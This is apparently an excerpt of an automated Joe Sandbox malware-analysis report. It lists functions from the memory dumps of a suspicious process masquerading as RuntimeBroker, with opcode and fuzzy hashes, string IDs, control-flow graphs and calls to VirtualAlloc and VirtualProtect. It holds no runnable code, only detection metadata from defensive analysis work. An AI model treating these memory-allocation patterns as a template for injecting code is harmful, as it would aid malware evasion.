                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7809B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.1842217227.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 20ba0bb1ec836644b79b3d658e2b540cc560894d5839436426b78833230160a6
                                                                                                                            • Instruction ID: 8db38d2d59f6739499f76ccca8209d90c49869f06f3971f7c1c041d0a20321bd
                                                                                                                            • Opcode Fuzzy Hash: 20ba0bb1ec836644b79b3d658e2b540cc560894d5839436426b78833230160a6
                                                                                                                            • Instruction Fuzzy Hash: C941BF0BB8E56A4DE31933FC75629FD6B468FA1335B0843F7F06E890D78E18608186E5

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:6
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 20527 7ffd9b77c491 20528 7ffd9b77c49f VirtualAlloc 20527->20528 20530 7ffd9b77c554 20528->20530 20531 7ffd9b77b4ba 20532 7ffd9b77b4c9 VirtualProtect 20531->20532 20534 7ffd9b77b5ae 20532->20534

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B770D48 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 208 7ffd9b770d48-7ffd9b770d9b call 7ffd9b7707d0 211 7ffd9b770da0-7ffd9b770f05 208->211 230 7ffd9b770f1e 211->230 231 7ffd9b770f07-7ffd9b770f1d 211->231 232 7ffd9b770f1f-7ffd9b771050 230->232 231->232
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5Z_H
                                                                                                                            • API String ID: 0-3267294416
                                                                                                                            • Opcode ID: 05196e9f994346e5314ea41393995594fab843c2b6c079ec7c2b66b470fb65a3
                                                                                                                            • Instruction ID: 551707fa64e8dd9c4585849cc64e2c7a12baf40ae280eafd43c71cc1433ab00e
                                                                                                                            • Opcode Fuzzy Hash: 05196e9f994346e5314ea41393995594fab843c2b6c079ec7c2b66b470fb65a3
                                                                                                                            • Instruction Fuzzy Hash: 9C91F4B5B19A8D4FEB59EBA888797AD7FE1FF55310F4001BAD04AC72E2DAB81410C740
                                                                                                                            Function 00007FFD9B77B4BA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 137memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B777000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B777000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b777000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: UAWA
                                                                                                                            • API String ID: 544645111-1492024814
                                                                                                                            • Opcode ID: 91c9f180a1994ce12f3613c94d9f4b8ebeb7feefa69bcce3162a1bf65000644e
                                                                                                                            • Instruction ID: 737103a8173254b42efbf380a25f205ef0f8f5114f84247a0bafe6dfda09c7d0
                                                                                                                            • Opcode Fuzzy Hash: 91c9f180a1994ce12f3613c94d9f4b8ebeb7feefa69bcce3162a1bf65000644e
                                                                                                                            • Instruction Fuzzy Hash: 78412D31A0C7894FDB199BA898566E97FE0EF56321F0443AFD099D3293CF746406C792
                                                                                                                            Function 00007FFD9B781752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 11 7ffd9b781752 12 7ffd9b781757-7ffd9b78177d 11->12 15 7ffd9b781783-7ffd9b7817ae 12->15 16 7ffd9b7818d1-7ffd9b7818fb 12->16 26 7ffd9b7817b0-7ffd9b7817ba 15->26 27 7ffd9b7817bd-7ffd9b781845 15->27 21 7ffd9b7818fd-7ffd9b78191a 16->21 22 7ffd9b781947-7ffd9b78194a 16->22 28 7ffd9b781920-7ffd9b781945 21->28 29 7ffd9b781a8b-7ffd9b781a93 21->29 25 7ffd9b781951-7ffd9b781986 22->25 45 7ffd9b781a2c-7ffd9b781a42 25->45 46 7ffd9b78198c-7ffd9b7819df 25->46 26->27 62 7ffd9b78188c-7ffd9b78188f 27->62 63 7ffd9b781847-7ffd9b78188a 27->63 28->22 36 7ffd9b781a94-7ffd9b781a99 29->36 38 7ffd9b781a9b-7ffd9b781aaf 36->38 39 7ffd9b781a47-7ffd9b781a62 36->39 42 7ffd9b781c4d-7ffd9b781c4e 38->42 55 7ffd9b781a69-7ffd9b781a84 39->55 47 7ffd9b781c55-7ffd9b781c61 42->47 48 7ffd9b781c50 call 7ffd9b782918 42->48 45->42 46->55 70 7ffd9b7819e5-7ffd9b7819f0 46->70 48->47 55->29 64 7ffd9b7818a4-7ffd9b7818a5 62->64 65 7ffd9b781891-7ffd9b7818a2 62->65 69 7ffd9b7818b1-7ffd9b7818cb 63->69 64->69 65->69 69->15 69->16 72 7ffd9b780f9d-7ffd9b780fdc 70->72 73 7ffd9b7819f6-7ffd9b781a00 70->73 84 7ffd9b780fde-7ffd9b781149 72->84 73->36 75 7ffd9b781a06-7ffd9b781a26 73->75 75->45 75->46 109 7ffd9b78114b-7ffd9b781154 84->109 110 7ffd9b781178-7ffd9b7811b9 84->110 111 7ffd9b78115a-7ffd9b78116a 109->111 112 7ffd9b781699-7ffd9b7816cf 109->112 122 7ffd9b7811ce-7ffd9b781243 110->122 123 7ffd9b7811bb-7ffd9b7811cd 110->123 116 7ffd9b781170-7ffd9b781174 111->116 124 7ffd9b7816d1-7ffd9b781710 112->124 125 7ffd9b781748-7ffd9b781751 112->125 116->110 140 7ffd9b781274-7ffd9b7812c3 122->140 141 7ffd9b781245-7ffd9b78126e 122->141 123->122 134 7ffd9b781712-7ffd9b781715 124->134 135 7ffd9b78172a-7ffd9b781746 124->135 125->11 134->135 136 7ffd9b781717-7ffd9b781727 134->136 135->124 135->125 136->135 149 7ffd9b7812cf-7ffd9b781307 140->149 150 7ffd9b7812c5-7ffd9b7812ca 140->150 141->140 155 7ffd9b781313-7ffd9b78134b 149->155 156 7ffd9b781309-7ffd9b78130e 149->156 151 7ffd9b781683-7ffd9b781693 150->151 151->112 151->116 160 7ffd9b78134d-7ffd9b781352 155->160 161 7ffd9b781357-7ffd9b78138f 155->161 156->151 160->151 165 7ffd9b781391-7ffd9b781396 161->165 166 7ffd9b78139b-7ffd9b7813d3 161->166 165->151 170 7ffd9b7813df-7ffd9b781417 166->170 171 7ffd9b7813d5-7ffd9b7813da 166->171 175 7ffd9b781423-7ffd9b78145b 170->175 176 7ffd9b781419-7ffd9b78141e 170->176 171->151 180 7ffd9b78145d-7ffd9b781462 175->180 181 7ffd9b781467-7ffd9b78149f 175->181 176->151 180->151 185 7ffd9b7814a1-7ffd9b7814a6 181->185 186 7ffd9b7814ab-7ffd9b7814e3 181->186 185->151 190 7ffd9b7814ef-7ffd9b781527 186->190 191 7ffd9b7814e5-7ffd9b7814ea 186->191 195 7ffd9b781533-7ffd9b78156b 190->195 196 7ffd9b781529-7ffd9b78152e 190->196 191->151 200 7ffd9b78156d-7ffd9b781572 195->200 201 7ffd9b781577-7ffd9b7815af 195->201 196->151 200->151 205 7ffd9b7815b1-7ffd9b7815b6 201->205 206 7ffd9b7815bb-7ffd9b7815c4 201->206 205->151 206->151
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M_H
                                                                                                                            • API String ID: 0-1939843538
                                                                                                                            • Opcode ID: 105613c73a701d5dd49430faf8ded68bfb7fe98d9e36236e6cdd7446df278d84
                                                                                                                            • Instruction ID: 198c045ba8f2f7fb2711ed59eee8ec3b890986a33e43e7d03a7bcec137ed7c09
                                                                                                                            • Opcode Fuzzy Hash: 105613c73a701d5dd49430faf8ded68bfb7fe98d9e36236e6cdd7446df278d84
                                                                                                                            • Instruction Fuzzy Hash: 6D62B421B19E4E4FEBA8EB6884A56B87392FF98341F4506B9D04EC36F2DD347D818741
                                                                                                                            Function 00007FFD9B77C491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 241 7ffd9b77c491-7ffd9b77c49d 242 7ffd9b77c4a1-7ffd9b77c4dd 241->242 243 7ffd9b77c49f 241->243 244 7ffd9b77c4e1-7ffd9b77c552 VirtualAlloc 242->244 243->242 243->244 247 7ffd9b77c554 244->247 248 7ffd9b77c55a-7ffd9b77c582 244->248 247->248
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B777000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B777000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b777000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 75afd82c597a16a5e05320543eda0b11649b37fc621f1ac55ec38b919792a24d
                                                                                                                            • Instruction ID: a0e4e7a1d933bc5c5f3376915c5ab2926d31601d716f7fd47c2e9801d264df6c
                                                                                                                            • Opcode Fuzzy Hash: 75afd82c597a16a5e05320543eda0b11649b37fc621f1ac55ec38b919792a24d
                                                                                                                            • Instruction Fuzzy Hash: BD313C31A0CB4C4FDB1DAB6898566F97BF0EF9A321F04426FE04AC3153DA646815C781
                                                                                                                            Function 00007FFD9B7AA529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 250 7ffd9b7aa529-7ffd9b7aa53d 251 7ffd9b7aa53f-7ffd9b7aa55a 250->251 252 7ffd9b7aa55e-7ffd9b7aa563 251->252
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: a93d2a248ea0654378756a9141250200c30c0adf332f666a415f47f781cf5e95
                                                                                                                            • Instruction ID: 6931bf5223a78d7b570b726fab5cc590d3e02653aec87cace6b8d6fcd26d403c
                                                                                                                            • Opcode Fuzzy Hash: a93d2a248ea0654378756a9141250200c30c0adf332f666a415f47f781cf5e95
                                                                                                                            • Instruction Fuzzy Hash: DDE0656160E7C44FC71AD6744869454BFA0EF6721174A42EEC045CF1A7EA1D8885CB01
                                                                                                                            Function 00007FFD9B7A1AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 258 7ffd9b7a1ad9-7ffd9b7a1aed 259 7ffd9b7a1aef-7ffd9b7a1b04 258->259 260 7ffd9b7a1b08-7ffd9b7a1b0d 259->260
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: ca249ac62d4b0a9b106ef4829e80241cf880ff62619d6a86180e9d838983c85e
                                                                                                                            • Instruction ID: f0e4966808ee54329ee4507175720b8a9c8ec9678878fcb04f4e1cf098b38544
                                                                                                                            • Opcode Fuzzy Hash: ca249ac62d4b0a9b106ef4829e80241cf880ff62619d6a86180e9d838983c85e
                                                                                                                            • Instruction Fuzzy Hash: 9AE01A6154F7C48FCB56EB7488698457FA0EE6B21078B41EEC089CF1B3E62D8849CB01
                                                                                                                            Function 00007FFD9B7A7E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 261 7ffd9b7a7e19-7ffd9b7a7e44 263 7ffd9b7a7e48-7ffd9b7a7e4d 261->263
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 05e2efae1749ebba7e531536ad54cce18b74356b03b21bc989c0cfa8ad1ca45b
                                                                                                                            • Instruction ID: 785abcc5c99e01c55f1b19db252c98afe54485a7caf5d8705288beafd40f4f84
                                                                                                                            • Opcode Fuzzy Hash: 05e2efae1749ebba7e531536ad54cce18b74356b03b21bc989c0cfa8ad1ca45b
                                                                                                                            • Instruction Fuzzy Hash: A1E01A6154F7C44FCB56EB7488698447FA1AE6B21078B41EEC185CF1B3E62D9849C701
                                                                                                                            Function 00007FFD9B7993E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 253 7ffd9b7993e9-7ffd9b799414 255 7ffd9b799418-7ffd9b79941d 253->255
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b793000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 125b5bc173154e6d4a94e4e80b73751d94c7972a0a5d355a41492f35a1e5dcb1
                                                                                                                            • Instruction ID: cc30c23fc4e547a2946316859384af3fa3b7be558d339d2a5eead1ba0bbc7c11
                                                                                                                            • Opcode Fuzzy Hash: 125b5bc173154e6d4a94e4e80b73751d94c7972a0a5d355a41492f35a1e5dcb1
                                                                                                                            • Instruction Fuzzy Hash: 2AE0E56154E7C48FDB56EA74886A8547FA0AF6B21078A41EEC089CB1B3E6299849C701
                                                                                                                            Function 00007FFD9B799599 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 256 7ffd9b799599-7ffd9b7995c4 257 7ffd9b7995c8-7ffd9b7995cd 256->257
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b793000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 9f04dc6ddcf9306befead4eb45ac78a9e3efd481051b3d51e923b5a525de626b
                                                                                                                            • Instruction ID: 2decf7cdf0b6a8137ceb2c839a535a4f2329786d650a15ff47397300a79bba6b
                                                                                                                            • Opcode Fuzzy Hash: 9f04dc6ddcf9306befead4eb45ac78a9e3efd481051b3d51e923b5a525de626b
                                                                                                                            • Instruction Fuzzy Hash: 78E04F7154A3C04FCB16EB7488A98457FB0EE6721078B41DEC04ACB1B3E62DD949CB01
                                                                                                                            Function 00007FFD9B7995D1 Relevance: .3, Instructions: 312COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b793000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 507f07c497b7833334450503fa026cb9dc4043f2023f3d7dbe0850d449364a9b
                                                                                                                            • Instruction ID: 957f67ebd43922ddd8b88f43d8a383c62f45c96b614870d25ad366e9a63a192b
                                                                                                                            • Opcode Fuzzy Hash: 507f07c497b7833334450503fa026cb9dc4043f2023f3d7dbe0850d449364a9b
                                                                                                                            • Instruction Fuzzy Hash: 98A19370B1990D4FEB58EB68C4A9AB977E2FF58304B5106B9E01EC72E6DF34A841C741
                                                                                                                            Function 00007FFD9B7A317D Relevance: .3, Instructions: 287COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1068f01461e5846608971ef12478346fe5de50cf3eea738bc120a63ed45c1c2b
                                                                                                                            • Instruction ID: 184f90ef83874251943a7f89344ecf7031091909c015e081ae4dbc2556afd8f5
                                                                                                                            • Opcode Fuzzy Hash: 1068f01461e5846608971ef12478346fe5de50cf3eea738bc120a63ed45c1c2b
                                                                                                                            • Instruction Fuzzy Hash: C191C421B1DA4E0FEBD8EE68847667972C2EF94340F4542BAE40EC72E7DD2879458391
                                                                                                                            Function 00007FFD9B7A2111 Relevance: .1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cdac3f8c989c1a52f24a8b55bbf4485645fae8f982ea41cc685748b85645bf6e
                                                                                                                            • Instruction ID: 42590f1145c5d52dc7f9f5f07fb70a678462326112f23788c80519ec00cfbf13
                                                                                                                            • Opcode Fuzzy Hash: cdac3f8c989c1a52f24a8b55bbf4485645fae8f982ea41cc685748b85645bf6e
                                                                                                                            • Instruction Fuzzy Hash: C3313831A0D64D8FE769DB58C8647F93791EB95310F0602BED40AC72E2DA686D81C781
                                                                                                                            Function 00007FFD9B7AD621 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7c7fe6bd06f73e246e53742e78ce5e4b1f7549b23b5e196673efd084d84dac30
                                                                                                                            • Instruction ID: 2e001efc67097bc2735f709472ca297f09735d4166167335a16e86fa17724137
                                                                                                                            • Opcode Fuzzy Hash: 7c7fe6bd06f73e246e53742e78ce5e4b1f7549b23b5e196673efd084d84dac30
                                                                                                                            • Instruction Fuzzy Hash: 4A21E531F0961D4FEBA8DA68D8242ED77E1EB58310F0506B7D019D71E5DE38AE4187C0
                                                                                                                            Function 00007FFD9B770C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 66acbdfa29e259dc479f8b128244f3393379f8680fb77eda9ee1d0b25a72248f
                                                                                                                            • Instruction ID: 2975ada1e1f6c54c3359bbf30bc1f58d345ba2193e935e826e06f3674e3176b6
                                                                                                                            • Opcode Fuzzy Hash: 66acbdfa29e259dc479f8b128244f3393379f8680fb77eda9ee1d0b25a72248f
                                                                                                                            • Instruction Fuzzy Hash: B721F936B0D75D8FEB22A7A89C650EC7B60EF42325F1542F7D148CB1E3D97826468781
                                                                                                                            Function 00007FFD9B78B402 Relevance: .1, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: abb0f79856e160a6a516fc2d9cbe742b3b80895c275b1d71424adb34eefcdb27
                                                                                                                            • Instruction ID: 52fb0da8278128a64a942da2278145dc1d9d80475b0e2908efde396be983773a
                                                                                                                            • Opcode Fuzzy Hash: abb0f79856e160a6a516fc2d9cbe742b3b80895c275b1d71424adb34eefcdb27
                                                                                                                            • Instruction Fuzzy Hash: D921A421B0DE1E8FF7B4AA6884E56B833D2EB94312F150679C40DD72F2DE38AD024780
                                                                                                                            Function 00007FFD9B770C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e6ccea529ea01e4a9675c20be81988027e339ade7c2926277c2e372ce70700f4
                                                                                                                            • Instruction ID: 9e31f33889cefd968c554faa60952fec8b5f0c056840761a5cd1482aff4604c8
                                                                                                                            • Opcode Fuzzy Hash: e6ccea529ea01e4a9675c20be81988027e339ade7c2926277c2e372ce70700f4
                                                                                                                            • Instruction Fuzzy Hash: 09117335B0E78D8FEB22DBA888A51EC7BB0EF52714F1646B7C044DB1F2D97416458781
                                                                                                                            Function 00007FFD9B77108D Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 95053e0d3825c4ef41f9b684ece18e5f2375151360e5006bf45d332a7b1b7e8a
                                                                                                                            • Instruction ID: 1a6d47afea635f34074653900cb9f943345ef41df052874018b63365863cd5fe
                                                                                                                            • Opcode Fuzzy Hash: 95053e0d3825c4ef41f9b684ece18e5f2375151360e5006bf45d332a7b1b7e8a
                                                                                                                            • Instruction Fuzzy Hash: 4001D625A8E3D60FD31687704CB29A53F94DF4322070902FEE499CB4F7C85C5546C362
                                                                                                                            Function 00007FFD9B7AAD4D Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b7a1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2185f21282ff93de29e550090768c60aa5ccee1a99a9fe5a0a5830b3dd00b970
                                                                                                                            • Instruction ID: fa56cf35461d38586008fac864d2cef241d13274bcd25df217a3d5d1e2bf1e83
                                                                                                                            • Opcode Fuzzy Hash: 2185f21282ff93de29e550090768c60aa5ccee1a99a9fe5a0a5830b3dd00b970
                                                                                                                            • Instruction Fuzzy Hash: 2101D131B0AA0D8FEB94E79894AA7F9B3D1FF98301F44017AE40CC32A2CF2468408742
                                                                                                                            Function 00007FFD9B78B46D Relevance: .0, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b5be8bedf72cd4da47451cdb4ede57def62398a2d8a37279a9fde7bcf405947
                                                                                                                            • Instruction ID: ccaec3936825e50edbfe73961c393f66252d00a5301ccb0538cbe6dad7ed49e5
                                                                                                                            • Opcode Fuzzy Hash: 9b5be8bedf72cd4da47451cdb4ede57def62398a2d8a37279a9fde7bcf405947
                                                                                                                            • Instruction Fuzzy Hash: 64F04B62B0AE4A8FEAE4DA6C44D16A537D2EB983107150675901DC32A6D935EC024781
                                                                                                                            Function 00007FFD9B770C48 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b770000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 705079fe517541d76ecad84fcd9d4aaea75855e4cd7e02e019e3b88bec33d416
                                                                                                                            • Instruction ID: 18b09426ce0f6d3611c5f928277fdc605f025e55b796e3ee059a8759f9e3eb8f
